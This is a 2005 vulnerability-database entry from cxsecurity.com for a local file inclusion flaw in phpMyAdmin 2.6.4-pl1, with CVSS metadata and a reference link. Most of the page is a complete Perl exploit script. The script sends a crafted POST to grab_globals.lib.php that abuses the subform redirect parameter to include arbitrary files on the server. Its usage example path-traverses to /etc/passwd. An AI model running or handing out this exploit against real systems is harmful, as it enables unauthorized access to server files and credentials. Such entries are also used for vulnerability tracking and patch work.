phpMyAdmin 2.6.4-pl1 Local file inclusion exploit

2005-10-10 / 2005-09-30
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

#!/usr/bin/perl use IO::Socket; # CXSecurity TEAM # Maksymilian Arciemowicz # Local file inclusion (./$FILE) # simple exploit phpMyAdmin 2.6.4-pl1 # # # CXSecurity if (@ARGV < 3) { print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n"; print " \r\n"; print "perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILE\r\n\r\n"; print "HOST - Host where is phpmyadmin example: http://localhost\r\n"; print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n"; print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n"; print "example cmd: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/ ../../../../../etc/passwd\r\n\r\n"; exit(); } $HOST = $ARGV[0]; $DIR = $ARGV[1]."libraries/grab_globals.lib.php"; $FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$ARGV[2]."&subform[1][cXIb8O3]=1"; $LENGTH = length $FILE; print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n"; $HOST =~ s/(http:\/\/)//; $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n"; print $get1 "POST ".$DIR." HTTP/1.0\n"; print $get1 "Host: ".%HOST."\n"; print $get1 "Content-Type: application/x-www-form-urlencoded\n"; print $get1 "Content-Length: ".$LENGTH."\n\n"; print $get1 $FILE; while ($odp = <$get1>) { if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) { printf "\n\nFile ".$ARGV[2]." no exists.\r\n\r\n"; exit; } printf $odp; }

References:

http://cxsecurity.com/issue/WLB-2005100029


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top